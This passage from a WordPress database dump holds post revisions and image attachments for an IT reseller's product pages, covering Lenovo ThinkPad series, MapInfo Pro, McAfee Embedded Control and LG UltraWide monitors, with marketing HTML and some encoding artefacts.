things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','McAfee','','inherit','closed','closed','','1549-revision-v1','','','2018-12-17 10:16:36','2018-12-17 02:16:36','',1549,'https://bintara.com.my/blog/2018/12/17/1549-revision-v1/',0,'revision','',0),(2252,1,'2018-12-17 11:02:26','2018-12-17 03:02:26','','hero','','inherit','closed','closed','','hero','','','2018-12-17 11:02:26','2018-12-17 03:02:26','',1545,'https://bintara.com.my/wp-content/uploads/2018/12/hero.png',0,'attachment','image/png',0),(2253,1,'2018-12-17 11:03:39','2018-12-17 03:03:39','','lenovo-laptop-think-t-series-hero2','','inherit','closed','closed','','lenovo-laptop-think-t-series-hero2','','','2018-12-17 11:03:39','2018-12-17 03:03:39','',1545,'https://bintara.com.my/wp-content/uploads/2018/12/lenovo-laptop-think-t-series-hero2.png',0,'attachment','image/png',0),(2254,1,'2018-12-17 11:05:46','2018-12-17 03:05:46','','lenovo-thinkpad-p-series-feature-hero','','inherit','closed','closed','','lenovo-thinkpad-p-series-feature-hero','','','2018-12-17 11:05:46','2018-12-17 03:05:46','',1545,'https://bintara.com.my/wp-content/uploads/2018/12/lenovo-thinkpad-p-series-feature-hero.png',0,'attachment','image/png',0),(2250,1,'2018-12-17 10:43:02','2018-12-17 02:43:02','<h3>MapInfo Proâ„¢ - Desktop GIS</h3>\r\n<h4 class=\"subhead\">See it faster, solve it sooner</h4>\r\n<iframe src=\"https://www.youtube.com/embed/IkZRDLHS-0w\" width=\"898\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\nAccess more data, gain richer insight and find the right answer with ease.\r\n<ul>\r\n 	<li>Flexible map displays</li>\r\n 	<li>Instant customisation</li>\r\n 	<li>Robust background maps</li>\r\n 	<li>Advanced analytics</li>\r\n 	<li>Smarter calculations</li>\r\n</ul>\r\n<h3 class=\"col-xs-12 copy-section-title\">Map a more successful future</h3>\r\n<h4>Powerful</h4>\r\nMake and share maps as beautiful as they are intelligent. Easily combine data, analytics and base maps to discover insights you wonâ€™t find in spreadsheets or charts.\r\n<h4>Simpler</h4>\r\nThe familiar ribbon-based interface works just like the applications you use every day. With our intuitive design, you donâ€™t need to be a computer whiz to become a map master.\r\n<h4>Faster</h4>\r\nVisualise data in less time than ever and update themes, layers and legends instantly. Take advantage of our next generation raster GIS capabilities with MapInfo Pro Advanced.\r\n<h4>Compatible</h4>\r\nIntegrate MapInfo Pro with your existing IT systems. Itâ€™s totally compatible with todayâ€™s most common PC data formats as well as relational and spatial databases.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','MapInfo','','inherit','closed','closed','','1548-revision-v1','','','2018-12-17 10:43:02','2018-12-17 02:43:02','',1548,'https://bintara.com.my/blog/2018/12/17/1548-revision-v1/',0,'revision','',0),(2251,1,'2018-12-17 11:08:54','2018-12-17 03:08:54','<h3 class=\"bar_3-heading\">THINKPAD</h3>\n<h3>PREMIUM PERFORMANCE,\nLEGENDARY RELIABILITY</h3>\nThere\'s a reason ThinkPad reliability is legendary and it starts with military-spec testing against extremes â€” our laptops more than endure the rigors of everyday life. Factor in the award-winning precision keyboard with its renowned red TrackPointÂ®, multitouch touchpad, ergonomic keys, and convenient multimedia buttons and we\'ve got comfort covered too.\n\n&nbsp;\n<div class=\"brandListings-header\">\n<h3 class=\"brandListings-title\">ThinkPad X Series</h3>\n</div>\n<div class=\"brandListings-body\">\n<p class=\"brandListings-description\"><strong>Thin &amp; Light Laptops</strong>\nUltralight, with performance for extreme mobility &amp; epic battery life.</p>\n<img class=\"alignnone wp-image-2252 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hero-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\n<p class=\"heroSectionContent-Quote\"><strong>First-class experience</strong></p>\n<p class=\"heroSectionContent-Quote\">Smaller footprints and epic battery life make X Series the business travelerâ€™s trusted companion. Their craftsmanship, versatility and robust security features ensure they\'re every professional\'s preference.</p>\n&nbsp;\n\n</div>\n<div class=\"brandListings-header\">\n<h3 class=\"brandListings-title\">ThinkPad T Series</h3>\n</div>\n<div class=\"brandListings-body\">\n<p class=\"brandListings-description\"><strong>Premium Laptops</strong>\nPerformance and durability in our flagship laptop series.</p>\n<img class=\"alignnone wp-image-2253 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-laptop-think-t-series-hero2-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\n<p class=\"heroSectionContent-Quote\"><strong>We\'ve got your back</strong></p>\n<p class=\"heroSectionContent-text\">Built to perform and engineered to endure, our flagship laptops have you covered in the office, out in the field, and everywhere in between. Productivity-rich features like epic battery life, blazing-fast USB â€“C ThunderboltÂ® ports, and powerful processing keep you up and running.</p>\n&nbsp;\n<div class=\"brandListings-header\">\n<h3 class=\"brandListings-title\">ThinkPad Edge Series</h3>\n</div>\n<div class=\"brandListings-body\">\n<p class=\"brandListings-description\"><strong>Preferred Small Business Solution</strong>\nDistinctive design, SMB manageability tools.</p>\n<p class=\"hero-productDescription-heading\"><strong>PREFERRED SMALL-BUSINESS LAPTOPS.</strong></p>\n<p class=\"hero-productDescription-body\">Put a distinctive face on your small business with these progressively designed, powerfully engineered laptops, featuring the security and productivity of Lenovo Solutions for Small Business.</p>\n&nbsp;\n<div class=\"brandListings-header\">\n<h3 class=\"brandListings-title\">ThinkPad L Series</h3>\n</div>\n<div class=\"brandListings-body\">\n<p class=\"brandListings-description\"><strong>Mainstream Performer, Aggressive Price</strong>\nTough and functional business laptops that fit the bill.</p>\n<p class=\"hero-productDescription-heading\"><strong>MAINSTREAM LAPTOPS</strong></p>\n<p class=\"hero-productDescription-body\">If it\'s productivity and price that matter most, these laptops fit the bill. The L Series, as with all of the ThinkPad family, boasts legendary reliability, our award-winning, spill-resistant keyboards, security options, and superior web-conferencing at cost-conscious pricing.</p>\n\n</div>\n</div>\n</div>\n<h3></h3>\n&nbsp;\n<div class=\"brandListings-body\">\n<div class=\"brandListings-body\">\n<div class=\"brandListings-body\">\n<h3>ThinkPad P Series</h3>\n<b><strong>A New Breed of Mobile Performance &amp; Style</strong></b>\n\nFusing the portability of a laptop and the performance of a workstation.\n\n<img class=\"alignnone wp-image-2254 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-thinkpad-p-series-feature-hero-300x226.png\" alt=\"\" width=\"300\" height=\"226\" />\n<p class=\"heroSectionContent-SubHeading\"><strong>P Series Mobile Workstations</strong></p>\n<p class=\"heroSectionContent-SubHeading\">Fusing the portability of a laptop and the performance of a workstation, the ThinkPad P Series laptops are ISV-certified for all major applications.Â  These systems feature lightning-fast graphics and processing, and the latest cutting-edge technology to handle your compute-intensive needsâ€”in surprisingly light packages.</p>\n&nbsp;\n<div class=\"brandListings-header\">\n<h3 class=\"brandListings-title\">ThinkPad A Series</h3>\n</div>\n<div class=\"brandListings-body\">\n<p class=\"brandListings-description\"><strong>Mainstream laptops with AMD technology</strong>\nHigh productivity and easy multitasking with AMD</p>\nMainstream business enterprise laptops with an emphasis on security. Feature-rich with professional-grade, integrated graphics, cutting-edge AMD processing, long battery life, and great storage options.\n\n</div>\n</div>\n</div>\n</div>\n&nbsp;\n\n&nbsp;','Lenovo','','inherit','closed','closed','','1545-autosave-v1','','','2018-12-17 11:08:54','2018-12-17 03:08:54','',1545,'https://bintara.com.my/blog/2018/12/17/1545-autosave-v1/',0,'revision','',0),(2255,1,'2018-12-17 11:07:04','2018-12-17 03:07:04','<h3 class=\"bar_3-heading\">THINKPAD</h3>\r\n<h3>PREMIUM PERFORMANCE,\r\nLEGENDARY RELIABILITY</h3>\r\nThere\'s a reason ThinkPad reliability is legendary and it starts with military-spec testing against extremes â€” our laptops more than endure the rigors of everyday life. Factor in the award-winning precision keyboard with its renowned red TrackPointÂ®, multitouch touchpad, ergonomic keys, and convenient multimedia buttons and we\'ve got comfort covered too.\r\n\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad X Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Thin &amp; Light Laptops</strong>\r\nUltralight, with performance for extreme mobility &amp; epic battery life.</p>\r\n<img class=\"alignnone wp-image-2252 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hero-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\r\n<p class=\"heroSectionContent-Quote\"><strong>First-class experience</strong></p>\r\n<p class=\"heroSectionContent-Quote\">Smaller footprints and epic battery life make X Series the business travelerâ€™s trusted companion. Their craftsmanship, versatility and robust security features ensure they\'re every professional\'s preference.</p>\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad T Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Premium Laptops</strong>\r\nPerformance and durability in our flagship laptop series.</p>\r\n<img class=\"alignnone wp-image-2253 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-laptop-think-t-series-hero2-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\r\n<p class=\"heroSectionContent-Quote\"><strong>We\'ve got your back</strong></p>\r\n<p class=\"heroSectionContent-text\">Built to perform and engineered to endure, our flagship laptops have you covered in the office, out in the field, and everywhere in between. Productivity-rich features like epic battery life, blazing-fast USB â€“C ThunderboltÂ® ports, and powerful processing keep you up and running.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad Edge Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Preferred Small Business Solution</strong>\r\nDistinctive design, SMB manageability tools.</p>\r\n<p class=\"hero-productDescription-heading\"><strong>PREFERRED SMALL-BUSINESS LAPTOPS.</strong></p>\r\n<p class=\"hero-productDescription-body\">Put a distinctive face on your small business with these progressively designed, powerfully engineered laptops, featuring the security and productivity of Lenovo Solutions for Small Business.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad L Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Mainstream Performer, Aggressive Price</strong>\r\nTough and functional business laptops that fit the bill.</p>\r\n<p class=\"hero-productDescription-heading\"><strong>MAINSTREAM LAPTOPS</strong></p>\r\n<p class=\"hero-productDescription-body\">If it\'s productivity and price that matter most, these laptops fit the bill. The L Series, as with all of the ThinkPad family, boasts legendary reliability, our award-winning, spill-resistant keyboards, security options, and superior web-conferencing at cost-conscious pricing.</p>\r\n\r\n<h3></h3>\r\n<h3>ThinkPad P Series</h3>\r\n<b><strong>A New Breed of Mobile Performance &amp; Style</strong></b>\r\n\r\nFusing the portability of a laptop and the performance of a workstation.\r\n\r\n<img class=\"alignnone wp-image-2254 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-thinkpad-p-series-feature-hero-300x226.png\" alt=\"\" width=\"300\" height=\"226\" />\r\n<p class=\"heroSectionContent-SubHeading\"><strong>P Series Mobile Workstations</strong></p>\r\n<p class=\"heroSectionContent-SubHeading\">Fusing the portability of a laptop and the performance of a workstation, the ThinkPad P Series laptops are ISV-certified for all major applications.Â  These systems feature lightning-fast graphics and processing, and the latest cutting-edge technology to handle your compute-intensive needsâ€”in surprisingly light packages.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad A Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Mainstream laptops with AMD technology</strong>\r\nHigh productivity and easy multitasking with AMD</p>\r\nMainstream business enterprise laptops with an emphasis on security. Feature-rich with professional-grade, integrated graphics, cutting-edge AMD processing, long battery life, and great storage options.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Lenovo','','inherit','closed','closed','','1545-revision-v1','','','2018-12-17 11:07:04','2018-12-17 03:07:04','',1545,'https://bintara.com.my/blog/2018/12/17/1545-revision-v1/',0,'revision','',0),(2256,1,'2018-12-17 11:07:48','2018-12-17 03:07:48','<h3 class=\"bar_3-heading\">THINKPAD</h3>\r\n<h3>PREMIUM PERFORMANCE,\r\nLEGENDARY RELIABILITY</h3>\r\nThere\'s a reason ThinkPad reliability is legendary and it starts with military-spec testing against extremes â€” our laptops more than endure the rigors of everyday life. Factor in the award-winning precision keyboard with its renowned red TrackPointÂ®, multitouch touchpad, ergonomic keys, and convenient multimedia buttons and we\'ve got comfort covered too.\r\n\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad X Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Thin &amp; Light Laptops</strong>\r\nUltralight, with performance for extreme mobility &amp; epic battery life.</p>\r\n<img class=\"alignnone wp-image-2252 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hero-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\r\n<p class=\"heroSectionContent-Quote\"><strong>First-class experience</strong></p>\r\n<p class=\"heroSectionContent-Quote\">Smaller footprints and epic battery life make X Series the business travelerâ€™s trusted companion. Their craftsmanship, versatility and robust security features ensure they\'re every professional\'s preference.</p>\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad T Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Premium Laptops</strong>\r\nPerformance and durability in our flagship laptop series.</p>\r\n<img class=\"alignnone wp-image-2253 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-laptop-think-t-series-hero2-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\r\n<p class=\"heroSectionContent-Quote\"><strong>We\'ve got your back</strong></p>\r\n<p class=\"heroSectionContent-text\">Built to perform and engineered to endure, our flagship laptops have you covered in the office, out in the field, and everywhere in between. Productivity-rich features like epic battery life, blazing-fast USB â€“C ThunderboltÂ® ports, and powerful processing keep you up and running.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad Edge Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Preferred Small Business Solution</strong>\r\nDistinctive design, SMB manageability tools.</p>\r\n<p class=\"hero-productDescription-heading\"><strong>PREFERRED SMALL-BUSINESS LAPTOPS.</strong></p>\r\n<p class=\"hero-productDescription-body\">Put a distinctive face on your small business with these progressively designed, powerfully engineered laptops, featuring the security and productivity of Lenovo Solutions for Small Business.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad L Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Mainstream Performer, Aggressive Price</strong>\r\nTough and functional business laptops that fit the bill.</p>\r\n<p class=\"hero-productDescription-heading\"><strong>MAINSTREAM LAPTOPS</strong></p>\r\n<p class=\"hero-productDescription-body\">If it\'s productivity and price that matter most, these laptops fit the bill. The L Series, as with all of the ThinkPad family, boasts legendary reliability, our award-winning, spill-resistant keyboards, security options, and superior web-conferencing at cost-conscious pricing.</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<h3></h3>\r\n&nbsp;\r\n<div class=\"brandListings-body\">\r\n<div class=\"brandListings-body\">\r\n<div class=\"brandListings-body\">\r\n<h3>ThinkPad P Series</h3>\r\n<b><strong>A New Breed of Mobile Performance &amp; Style</strong></b>\r\n\r\nFusing the portability of a laptop and the performance of a workstation.\r\n\r\n<img class=\"alignnone wp-image-2254 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-thinkpad-p-series-feature-hero-300x226.png\" alt=\"\" width=\"300\" height=\"226\" />\r\n<p class=\"heroSectionContent-SubHeading\"><strong>P Series Mobile Workstations</strong></p>\r\n<p class=\"heroSectionContent-SubHeading\">Fusing the portability of a laptop and the performance of a workstation, the ThinkPad P Series laptops are ISV-certified for all major applications.Â  These systems feature lightning-fast graphics and processing, and the latest cutting-edge technology to handle your compute-intensive needsâ€”in surprisingly light packages.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad A Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Mainstream laptops with AMD technology</strong>\r\nHigh productivity and easy multitasking with AMD</p>\r\nMainstream business enterprise laptops with an emphasis on security. Feature-rich with professional-grade, integrated graphics, cutting-edge AMD processing, long battery life, and great storage options.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Lenovo','','inherit','closed','closed','','1545-revision-v1','','','2018-12-17 11:07:48','2018-12-17 03:07:48','',1545,'https://bintara.com.my/blog/2018/12/17/1545-revision-v1/',0,'revision','',0),(2257,1,'2018-12-17 11:09:02','2018-12-17 03:09:02','<h3 class=\"bar_3-heading\">THINKPAD</h3>\r\n<h3>PREMIUM PERFORMANCE,\r\nLEGENDARY RELIABILITY</h3>\r\nThere\'s a reason ThinkPad reliability is legendary and it starts with military-spec testing against extremes â€” our laptops more than endure the rigors of everyday life. Factor in the award-winning precision keyboard with its renowned red TrackPointÂ®, multitouch touchpad, ergonomic keys, and convenient multimedia buttons and we\'ve got comfort covered too.\r\n\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad X Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Thin &amp; Light Laptops</strong>\r\nUltralight, with performance for extreme mobility &amp; epic battery life.</p>\r\n<img class=\"alignnone wp-image-2252 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hero-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\r\n<p class=\"heroSectionContent-Quote\"><strong>First-class experience</strong></p>\r\n<p class=\"heroSectionContent-Quote\">Smaller footprints and epic battery life make X Series the business travelerâ€™s trusted companion. Their craftsmanship, versatility and robust security features ensure they\'re every professional\'s preference.</p>\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad T Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Premium Laptops</strong>\r\nPerformance and durability in our flagship laptop series.</p>\r\n<img class=\"alignnone wp-image-2253 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-laptop-think-t-series-hero2-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\r\n<p class=\"heroSectionContent-Quote\"><strong>We\'ve got your back</strong></p>\r\n<p class=\"heroSectionContent-text\">Built to perform and engineered to endure, our flagship laptops have you covered in the office, out in the field, and everywhere in between. Productivity-rich features like epic battery life, blazing-fast USB â€“C ThunderboltÂ® ports, and powerful processing keep you up and running.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad Edge Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Preferred Small Business Solution</strong>\r\nDistinctive design, SMB manageability tools.</p>\r\n<p class=\"hero-productDescription-heading\"><strong>PREFERRED SMALL-BUSINESS LAPTOPS.</strong></p>\r\n<p class=\"hero-productDescription-body\">Put a distinctive face on your small business with these progressively designed, powerfully engineered laptops, featuring the security and productivity of Lenovo Solutions for Small Business.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad L Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Mainstream Performer, Aggressive Price</strong>\r\nTough and functional business laptops that fit the bill.</p>\r\n<p class=\"hero-productDescription-heading\"><strong>MAINSTREAM LAPTOPS</strong></p>\r\n<p class=\"hero-productDescription-body\">If it\'s productivity and price that matter most, these laptops fit the bill. The L Series, as with all of the ThinkPad family, boasts legendary reliability, our award-winning, spill-resistant keyboards, security options, and superior web-conferencing at cost-conscious pricing.</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<h3></h3>\r\n&nbsp;\r\n<div class=\"brandListings-body\">\r\n<div class=\"brandListings-body\">\r\n<div class=\"brandListings-body\">\r\n<h3>ThinkPad P Series</h3>\r\n<b><strong>A New Breed of Mobile Performance &amp; Style</strong></b>\r\n\r\nFusing the portability of a laptop and the performance of a workstation.\r\n\r\n<img class=\"alignnone wp-image-2254 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-thinkpad-p-series-feature-hero-300x226.png\" alt=\"\" width=\"300\" height=\"226\" />\r\n<p class=\"heroSectionContent-SubHeading\"><strong>P Series Mobile Workstations</strong></p>\r\n<p class=\"heroSectionContent-SubHeading\">Fusing the portability of a laptop and the performance of a workstation, the ThinkPad P Series laptops are ISV-certified for all major applications.Â  These systems feature lightning-fast graphics and processing, and the latest cutting-edge technology to handle your compute-intensive needsâ€”in surprisingly light packages.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad A Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Mainstream laptops with AMD technology</strong>\r\nHigh productivity and easy multitasking with AMD</p>\r\nMainstream business enterprise laptops with an emphasis on security. Feature-rich with professional-grade, integrated graphics, cutting-edge AMD processing, long battery life, and great storage options.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Lenovo','','inherit','closed','closed','','1545-revision-v1','','','2018-12-17 11:09:02','2018-12-17 03:09:02','',1545,'https://bintara.com.my/blog/2018/12/17/1545-revision-v1/',0,'revision','',0),(2481,1,'2018-12-18 22:53:33','2018-12-18 14:53:33','','Web Help Desk','','inherit','closed','closed','','web-help-desk','','','2018-12-18 22:53:33','2018-12-18 14:53:33','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Web-Help-Desk.png',0,'attachment','image/png',0),(2480,1,'2018-12-18 22:52:56','2018-12-18 14:52:56','','Serv-U Managed File Transfer Server','','inherit','closed','closed','','serv-u-managed-file-transfer-server','','','2018-12-18 22:52:56','2018-12-18 14:52:56','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Serv-U-Managed-File-Transfer-Server.png',0,'attachment','image/png',0),(2260,1,'2018-12-17 11:32:19','2018-12-17 03:32:19','','large_zoom01','','inherit','closed','closed','','large_zoom01','','','2018-12-17 11:32:19','2018-12-17 03:32:19','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01.jpg',0,'attachment','image/jpeg',0),(2464,1,'2018-12-18 22:40:51','2018-12-18 14:40:51','','NetFlow Traffic Analyzer','','inherit','closed','closed','','netflow-traffic-analyzer','','','2018-12-18 22:40:51','2018-12-18 14:40:51','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/NetFlow-Traffic-Analyzer.png',0,'attachment','image/png',0),(2469,1,'2018-12-18 22:44:28','2018-12-18 14:44:28','','Server Configuration Monitor','','inherit','closed','closed','','server-configuration-monitor','','','2018-12-18 22:44:28','2018-12-18 14:44:28','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Server-Configuration-Monitor.png',0,'attachment','image/png',0),(2261,1,'2018-12-17 11:33:47','2018-12-17 03:33:47','','large_zoom01 (1)','','inherit','closed','closed','','large_zoom01-1','','','2018-12-17 11:33:47','2018-12-17 03:33:47','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-1.jpg',0,'attachment','image/jpeg',0),(2459,1,'2018-12-18 22:34:47','2018-12-18 14:34:47','','Network Performance MonitorÂ ','','inherit','closed','closed','','network-performance-monitor','','','2018-12-18 22:34:47','2018-12-18 14:34:47','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Network-Performance-Monitor-.png',0,'attachment','image/png',0),(2262,1,'2018-12-17 11:35:03','2018-12-17 03:35:03','','34UC98-W_940_01','','inherit','closed','closed','','34uc98-w_940_01','','','2018-12-17 11:35:03','2018-12-17 03:35:03','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/34UC98-W_940_01.jpg',0,'attachment','image/jpeg',0),(2263,1,'2018-12-17 11:36:03','2018-12-17 03:36:03','','29UM69G-B_20180118_D01','','inherit','closed','closed','','29um69g-b_20180118_d01','','','2018-12-17 11:36:03','2018-12-17 03:36:03','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/29UM69G-B_20180118_D01.jpg',0,'attachment','image/jpeg',0),(2264,1,'2018-12-17 11:37:04','2018-12-17 03:37:04','','29UM59A-P_D1_110817','','inherit','closed','closed','','29um59a-p_d1_110817','','','2018-12-17 11:37:04','2018-12-17 03:37:04','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/29UM59A-P_D1_110817.jpg',0,'attachment','image/jpeg',0),(2265,1,'2018-12-17 11:42:05','2018-12-17 03:42:05','','medium01','','inherit','closed','closed','','medium01','','','2018-12-17 11:42:05','2018-12-17 03:42:05','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/medium01.jpg',0,'attachment','image/jpeg',0),(2266,1,'2018-12-17 11:44:03','2018-12-17 03:44:03','','d1','','inherit','closed','closed','','d1','','','2018-12-17 11:44:03','2018-12-17 03:44:03','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/d1.jpg',0,'attachment','image/jpeg',0),(2267,1,'2018-12-17 11:45:00','2018-12-17 03:45:00','','medium01 (1)','','inherit','closed','closed','','medium01-1','','','2018-12-17 11:45:00','2018-12-17 03:45:00','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/medium01-1.jpg',0,'attachment','image/jpeg',0),(2268,1,'2018-12-17 11:46:05','2018-12-17 03:46:05','<h3><strong>21:9 UltraWide Monitors</strong></h3>\r\n<img class=\"alignnone wp-image-2260 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29WK600-W (29\" 21:9 UltraWideâ„¢ Full HD IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>29â€ 21:9 WFHD (2560 x 1080) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Design</li>\r\n 	<li>Tilt Adjustable Stand</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class=\"alignnone wp-image-2261 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-1-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n<div class=\"improve-info-key-feature\">\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">38WK95C-W (38\" Class 21:9 UltraWideÂ® WQHD+ IPS Curved LED Monitor (37.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>38\" 21:9 WQHD+ (3840x1600) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>3-Side Borderless Design</li>\r\n 	<li>Tilt / Height Adjustable Stand</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2262 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34UC98-W_940_01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">34UC98-W (34\" Curved 21:9 UltraWideâ„¢ IPS Display)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>34\" 21:9 Curved WQHD IPS Display</li>\r\n 	<li>sRGB Over 99%</li>\r\n 	<li>Thunderbolt 2.0 (x 2)</li>\r\n 	<li>Screen Split 2.0 (PIP Mode)</li>\r\n 	<li>USB 3.0 Quick Charge</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2263 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM69G-B_20180118_D01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM69G-B (29\" Class 21:9 Ultrawideâ„¢ Full HD IPS Gaming Monitor (29\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 UltraWideâ„¢ Monitors</li>\r\n 	<li>1ms Motion Blur 